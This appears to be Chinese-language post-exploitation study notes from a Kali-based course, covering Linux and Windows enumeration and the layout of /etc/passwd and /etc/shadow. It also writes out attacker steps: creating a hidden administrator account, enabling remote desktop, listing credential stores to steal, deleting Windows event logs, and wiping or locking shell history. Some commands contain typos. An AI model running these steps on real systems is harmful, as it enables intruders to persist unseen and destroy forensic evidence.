








    whoami and who –a  

    ifconfig -a, iptables -L -n, ifconfig –a, netstat –r

    uname –a, ps aux 

    dpkg -l| head     

root@kali:~# /etc/resolv.confDNS          //域名解析的配置文件

root@kali:~# /etc/passwd       //存放用户账号

root@kali:~# /etc/shadow       //存放用户密码


 linux 里 /etc/passwd 、/etc/shadow和/etc/group 文件内容解释

一、/etc/passwd 是用户数据库,其中的域给出了用户名、加密口令和用户的其他信息

/etc/shadow文件中的记录行与/etc/passwd中的一一对应,它由pwconv命令根据/etc/passwd中的数据自动产生。它的文 件格式与/etc/passwd类似,由若干个字段组成,字段之间用“:”隔开。这些字段是:














#cat /etc/shadow





useradd -g mysql -d /home/test -m test(:新建一个用户test, 属于mysql组,开始目录是/home/test)

然后进入 /etc/passwd,可以看到如下信息,在最后一行可以看到刚加的用户的信息。如下

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin





haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
















shadow 是 passwd 的影子文件。

在linux中,口令文件在/etc/passwd中,早期的这个文件直接存放加密后的密码,前两位是"盐"值,是一个随机数,后面跟的是加密的密码。为了安全,现在的linux都提供了 /etc/shadow这个影子文件,密码放在这个文件里面,并且是只有root可读的。







passwd test

[root@localhost etc]# passwd test

Changing password for user test.

New UNIX password:

Retype new UNIX password:

passwd: all authentication tokens updated successfully.

[root@localhost etc]#


















Unix 系统最初是用明文保存密码的,后来由于安全的考虑,采用crypt()算法加密密码并存放在/etc/passwd文件。现在,由 于计算机处理能力的提高,使密码破解变得越来越容易。/etc/passwd文件是所有合法用户都可访问的,大家都可互相看到密码的加密字符串,这给系统 带来很大的安全威胁。现代的Unix系统使用影子密码系统,它把密码从/etc/pa sswd文件中分离出来,真正的密码保存在/etc/shadow文件中,shadow文件只能由超级用户访问。这样***者就不能获得加密密码串,用于破 解。使用shadow密码文件后,/etc/passwd文件中所有帐户的password域的内容为"x",如果password域的内容为"*",则 该帐号被停用。使用passwd这个程序可修改用户的密码。


root@kali:~# ifconfig -a           //显示系统中所有接口信息

root@kali:~# iptables -L -n    //防火墙配置

root@kali:~# netstat -rn  //查看当前路由的设置

root@kali:~# uname -a    //查看当前系统的版本

root@kali:~# ps aux   //查看进程

root@kali:~# dpkg -l| head    //所有的安装包



    ipconfig /all , ipconfig /displaydns, netstat -bnao , netstat –r 

    net view , net view /domain  

    net user /domain, net user %username% /domain    

    net accounts, net share  

    net localgroup administrators username /add  

    net group "Domain Controllers" /domain  

    net share name$=C:\ /unlimited  

    net user username /active:yes/domain   

C:\Documents and Settings\Administrator>cd\

C:\>ipconfig /?

C:\>ipconfig /displaydns


┃    wmic nicconfig get ipaddress,macaddress   

┃    wmic computersystem get username     

┃    wmic netlogin get name,lastlogon        

┃    wmic process get caption, executablepath,commandline         

┃    wmic process where name=“calc.exe" call terminate    

┃    wmic os get name,servicepackmajorversion    

┃    wmic product get name,version   

┃    wmic product where name=“name” call uninstall /nointeractive  

┃    wmic share get /ALL   

┃    wmic /node:"machinename" path Win32_TerminalServiceSetting where

┃AllowTSConnections="0" call SetAllowTSConnections "1“ 

┃    wmic nteventlog get path,filename, writeable    

C:\>wmic nicconfig get ipaddress,macaddress     //读取当前系统ip地址和mac地址

C:\>wmic computersystem get username          //查看当前登录账号

C:\>wmic netlogin get name,lastlogon      //查看用户登录的信息

LastLogon                  Name

                           NT AUTHORITY\SYSTEM

                           NT AUTHORITY\LOCAL SERVICE

                           NT AUTHORITY\NETWORK SERVICE

20150922182758.000000+480 W2K2\Administrator

C:\>wmic process get caption, executablepath,commandline       //查看当前系统的进程

C:\>wmic process where name=“calc.exe" call terminate         //结束进程

C:\>wmic os get name,servicepackmajorversion     //提取操作系统serverpack版本

Name                                                                                     ServicepackMajorVersion

Microsoft Windows Server 2003 Enterprise Edition:C:\WINDOWS|\Device\Harddisk0\Partition1 2

C:\>wmic product get name,version        //查看系统当前安装了哪些软件

C:\>wmic product where name=“name” call uninstall /nointeractive     //卸载软件不产生任何提示

C:\>wmic share get /ALL            //共享文件夹

C:\>wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1“    //开启远程桌面(支持远程的)

C:\>wmic /node:"localhost" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1“

C:\>wmic nteventlog get path,filename, writeable   //查看当前系统日志

FileName  Path                       Vriteable

appevent  \windows\system32\config\  TRUE       //应用程序

secevent  \windows\system32\config\  TRUE       //安全性

sysevent  \windows\system32\config\  TRUE       //系统


┃    商业信息    

┃    系统信息    

┃    Linux    

┃    /etc ; /usr/local/etc   

┃    /etc/password ; /etc/shadow      

┃    .ssh ; .gnupg 公私钥   

┃    The e-mail and data files    

┃    业务数据库 ;身份认证服务器数据库 

┃    /tmp   

root@kali:~# cd .ssh/

root@kali:~/.ssh# ls


root@kali:~/.ssh# cat known_hosts


┃    windows   

┃    SAM 数据库 ; 注册表文件

┃    %SYSTEMROOT%\repair\SAM 

┃    %SYSTEMROOT%\System32\config\RegBack\SAM  

┃    业务数据库 ; 身份认证数据库 

┃    临时文件目录 

┃    UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\



┃    禁止在登陆界面显示新建账号  

┃    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows      

┃NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v uname /T


┃    del %WINDIR%\*.log /a/s/q/f   

┃    History   

┃    日志 

┃    auth.log / secure   

┃    btmp / wtmp     

┃    lastlog / faillog   

┃    其他日志和 HIDS 等      

C:\>ner user a a /add

C:\>net localgroup administrators a /add

C:\>REH ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v a /T REG_DWORD /D 0    //禁止在登陆界面显示新建账号

C:\>del %WINDIR%\*.log /a/s/q/f       //删除日志

root@kali:~# history        //命令历史

root@kali:~# ls -l .bash_history

-rw------- 1 root root 48948 9月  22 20:14 .bash_history

root@kali:~# cat .bash_history

root@kali:~# history -c   //擦除命令

root@kali:~# history

1017 history

root@kali:~# lsa

lsadump  lsar     lsattr

root@kali:~# lsattr

-------------e-- ./文档

-------------e-- ./音乐

-------------e-- ./图片

-------------e-- ./桌面

-------------e-- ./公共

-------------e-- ./下载

-------------e-- ./模板

-------------e-- ./视频

root@kali:~# cha

chacl        chage     chardet     chardet3     chardetet    chardetec3  charmap    chat   chattr

root@kali:~# chat

chat    chattr

root@kali:~# chattr -h

Usage: chattr [-RVf] [-+=aAcCdDeijsStTu] [-v version] files...

root@kali:~# man chattr

root@kali:~# chattr +i .bash_history

root@kali:~# lsattr .bash_history

----i--------e-- .bash_history

root@kali:~# chattr -i .bash_history

root@kali:~# rm .bash_history

root@kali:~# touch .bash_history   //添加文件

root@kali:~# chattr +i .bash_history

root@kali:~# lastb

root     :0           :0               Mon Oct 26 12:25 - 12:25  (00:00)    

root     :0           :0               Thu Oct 22 19:07 - 19:07  (00:00)    

root     :0           :0               Wed Oct 21 19:53 - 19:53  (00:00)    

root     :0           :0               Sun Oct 11 13:43 - 13:43  (00:00)    

root     :0           :0               Sun Oct  4 15:48 - 15:48  (00:00)    

root     :0           :0               Sat Oct  3 18:03 - 18:03  (00:00)    

root     :0           :0               Fri Oct  2 14:14 - 14:14  (00:00)    

root     :0           :0               Fri Oct  2 14:14 - 14:14  (00:00)   




